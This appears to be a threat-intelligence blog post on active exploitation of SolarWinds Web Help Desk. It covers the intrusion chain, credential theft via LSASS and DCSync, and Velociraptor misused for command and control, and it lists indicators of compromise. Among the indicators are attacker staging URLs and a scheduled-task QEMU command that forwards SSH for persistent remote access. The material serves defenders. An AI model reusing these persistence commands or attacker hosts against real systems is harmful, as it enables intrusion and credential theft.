Threat Intelligence Multiple Researchers Confirm Active Exploitation of SolarWinds Web Help Desk Instances Posted on February 9, 2026 Bradford Regeski, Cyber Threat Intelligence Analyst Summary Threat actors are actively exploiting critical vulnerabilities in internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve unauthenticated remote code execution. These intrusions follow a high-impact pattern where a single unpatched application serves as a gateway for lateral movement and full domain compromise. Once inside, attackers deploy a mix of legitimate remote monitoring tools and specialized command-and-control frameworks to maintain persistent access. While the specific vulnerabilities exploited are not actively identified, CVE-2025-40551 was recently added to CISA’s Known Exploited Vulnerabilities database, CVE-2025-40536, and CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation. Security teams are urged to patch all WHD versions prior to 12.8.7 HF1 immediately and monitor unauthorized administrative tool installations. Technical Analysis The exploit chain begins when the vulnerable WHD service wrapper spawns a Java process that initiates PowerShell or cmd[.]exe to retrieve malicious payloads via BITS or msiexec. These payloads often include the Zoho ManageEngine RMM agent, which threat actors use to conduct hands-on-keyboard reconnaissance of Active Directory environments. In several instances, attackers utilized the file-hosting services Catbox and Supabase to stage malicious MSI installers while registering agents to anonymous Proton Mail accounts. Persistence is frequently established through reverse SSH tunnels and the creation of scheduled tasks designed to launch QEMU virtual machines, effectively masking malicious traffic within a virtualized SYSTEM context. To further evade detection, threat actors perform DLL sideloading by abusing wab.exe to load a malicious sspicli.dll, facilitating direct access to LSASS memory and credential theft. Lateral movement follows textbook patterns, starting with domain computer enumeration and escalating to DCSync attacks that request password data directly from domain controllers. Defenders have also observed the deployment of Velociraptor , a legitimate forensics tool, repurposed as a command-and-control framework through customized configuration files pointing to Cloudflare Workers. Remediation requires the immediate isolation of compromised hosts, rotation of high-privilege service credentials, and the thorough removal of unauthorized RMM artifacts like TOOLSIQ.EXE. Indicators of Compromise Huntress provided the following Indicators of Compromise for revie and ingestion related to recent SolarWinds exploitation. Indicator Description https[:]//files.catbox[.]moe/tmp9fc.msi SHA256: 897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189 Zoho Meetings Installer https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi SHA256: 46831be6e577e3120084ee992168cca5af2047d4a08e3fd67ecd90396393b751 Velociraptor Installer https[:]//auth.qgtxtebl.workers[.]dev/ Velociraptor Server URL https[:]//github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi Cloudfared Installer https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/code.txt C:\ProgramData\Microsoft\code.exe SHA256: 34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4 Portable version of VSCode https[:]//62c4cbb992274c32922cfbb49d623bd1.us-central1.gcp.cloud.es[.]io Elastic Search URL esmahyft@proton[.]me Zoho Assist Account Email v2-api.mooo[.]com Velociraptor Failover Domain client.config[.]yaml SHA256: bbd6e120bf55309141f75c85cc94455b1337a1a4333f6868b245b2edfa97ef44 Velociraptor Config File Task Path: C:\Windows\System32\Tasks\TPMProfiler Command: C:\Users\[user]\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22 Scheduled Task (persistence) Task Path: C:\Windows\System32\Tasks\TPMProfiler Command: C[:]\Users\[user]\local\qemu-system-x86_64 -m 1G -smp 1 -hda bisrv.dll -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::32567-:22 Scheduled Task (persistence) More Recent Blog Posts Singapore Government Reports Technical Details of Telecom Targeting by Alleged Chinese State-Backed Threat Group Executive Summary On 9 February 2026, Singapore authorities confirmed that the China-linked cyber espionage group UNC3886 conducted a deliberate, targeted, and well-planned operation against all four of Read More » Fortinet Confirms Active FortiCloud SSO Bypass on Fully Patched FortiGate Firewalls for CVE-2025-59718 and CVE-2025-59719 Summary A newly identified cluster of automated malicious activity is targeting Fortinet FortiGate appliances by exploiting an unauthenticated Single Sign-On (SSO) bypass, according to new intelligence Read More » Okta Warns Users of